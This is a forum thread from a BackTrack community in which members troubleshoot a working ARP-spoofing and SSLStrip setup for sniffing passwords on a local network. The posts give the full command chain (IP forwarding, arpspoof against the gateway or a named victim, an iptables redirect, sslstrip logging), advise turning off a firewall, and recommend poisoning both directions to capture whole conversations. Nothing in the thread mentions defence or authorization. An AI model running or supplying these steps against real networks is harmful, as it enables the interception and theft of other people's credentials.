Results 1 to 8 of 8

Thread: Problem with Password Sniffing with SSLStrip

Hybrid View

  1. #1
    Good friend of the forums Eatme's Avatar
    Join Date
    Aug 2009
    Location
    Socks5
    Posts
    308

    Default Problem with Password Sniffing with SSLStrip

    While on VMware everything was working perfectly, these are the commands I always entered in the following order:

    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    
    cat /proc/sys/net/ipv4/ip_forward (returned with NUM 1)
    
    arpspoof -i wlan0 192.168.1.1 (gateway is just being used so that I can sniff the whole network)
    
    iptables --flush
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    
    sslstrip -a -f -k -l 8080
    (creates sslstrip.log)
    Now that I'm running a HD install (no more vmware) these steps are not working anymore...
    Even the sslstrip.log is not saving anything...

    BT4-Final
    uname -r: 2.6.34
    HD Install
    Wiffy-Auto-Cracker - was the best thing that ever happen to me. :) Wo0oT :)
    AWUSO36H_500mW_5dBi Antenna

  2. #2
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: Problem with Password Sniffing with SSLStrip

    I would suggest you try sniffing only 1 target and post back the results.
    Code:
    arpspoof -i wlan0 -t VictimIP DefaultGW
    Oh and by the way turn off your firewall (if you have one)
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  3. #3
    Good friend of the forums Eatme's Avatar
    Join Date
    Aug 2009
    Location
    Socks5
    Posts
    308

    Default Re: Problem with Password Sniffing with SSLStrip

    Quote Originally Posted by sickness View Post
    I would suggest you try sniffing only 1 target and post back the results.
    Code:
    arpspoof -i wlan0 -t VictimIP DefaultGW
    Oh and by the way turn off your firewall (if you have one)
    why can't I sniff the whole network though ? and before this worked with no problems..
    Wiffy-Auto-Cracker - was the best thing that ever happen to me. :) Wo0oT :)
    AWUSO36H_500mW_5dBi Antenna

  4. #4
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: Problem with Password Sniffing with SSLStrip

    Well that's what we are trying to find out, so try with only 1 target and give us a feedback
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  5. #5
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    3

    Default Re: Problem with Password Sniffing with SSLStrip

    Not a hundred percent sure as I am trying to get my head round several issues that
    I have with this programme...

    However, the command...

    sslstrip -a -f -k -l 8080

    does the -k switch no kill the process before it has run

    -k , --killsessions Kill sessions in progress.
    the above was taken from the splash screen when sslstrip is first run.

    I may be wrong but who knows........

    Rab.

  6. #6
    Good friend of the forums Eatme's Avatar
    Join Date
    Aug 2009
    Location
    Socks5
    Posts
    308

    Default Re: Problem with Password Sniffing with SSLStrip

    Quote Originally Posted by sickness View Post
    I would suggest you try sniffing only 1 target and post back the results.
    Code:
    arpspoof -i wlan0 -t VictimIP DefaultGW
    Oh and by the way turn off your firewall (if you have one)
    ok, thanks this has worked (i had a thought it would, just didn't go with it). I think I got stuck at trying to arpspoof my self as well as the whole network and checking to see if it works while I'm on the same computer instead of going on the other computer and seeing the results... well this time I did.

    But why all of the sudden, I can't arpspoof (-i wlan0 -t 192.168.1.ME 192.168.1.1) my self on HD install ? On vmware this wasn't a problem.

    Never the less, sniffing the whole network still works, I just never tried to see the results on another computer..thanks guys!
    Wiffy-Auto-Cracker - was the best thing that ever happen to me. :) Wo0oT :)
    AWUSO36H_500mW_5dBi Antenna

  7. #7
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: Problem with Password Sniffing with SSLStrip

    No problem glad we could help
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  8. #8
    Good friend of the forums gunrunr's Avatar
    Join Date
    Jan 2010
    Location
    shining my spoon
    Posts
    265

    Default Re: Problem with Password Sniffing with SSLStrip

    if you use said commands and run wireshark are you seeing any packets being redirected to you? anything on port 80 like get requests?

    usually i tend to poison both ways instead of just one way like you are doing, just poisoning the gateway in one direction doesn't work well for me. usuallyu i poison the gateway and the clients on it, so i can get both sides of the conversation like this
    Code:
    arpspoof -t 192.168.1.1 192.168.1.2
    arpspoof -t 192.168.1.2 192.168.1.1
    take a look at irongeeks page Basics of Arpspoofing/Arppoisoning
    Wielder of the spoon of doom
    Summercon, Toorcon, Defcon, Bsides, Derbycon, Shmoocon oh my
    Come hang out with hackers on twitter @gunrunr556

Similar Threads

  1. Replies: 44
    Last Post: 04-08-2011, 02:30 AM
  2. Replies: 1
    Last Post: 09-25-2010, 09:12 PM
  3. Sickness - Password Sniffing with SSLStrip.
    By sickness in forum BackTrack Videos
    Replies: 35
    Last Post: 09-17-2010, 01:16 PM
  4. sslstrip with ettercap or airspoof not capturing password
    By danielgc in forum OLD BackTrack 4 General Support
    Replies: 3
    Last Post: 08-29-2009, 10:29 PM
  5. Strange Password Sniffing Problem
    By TheVinMeister in forum OLD Newbie Area
    Replies: 1
    Last Post: 07-30-2008, 01:48 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •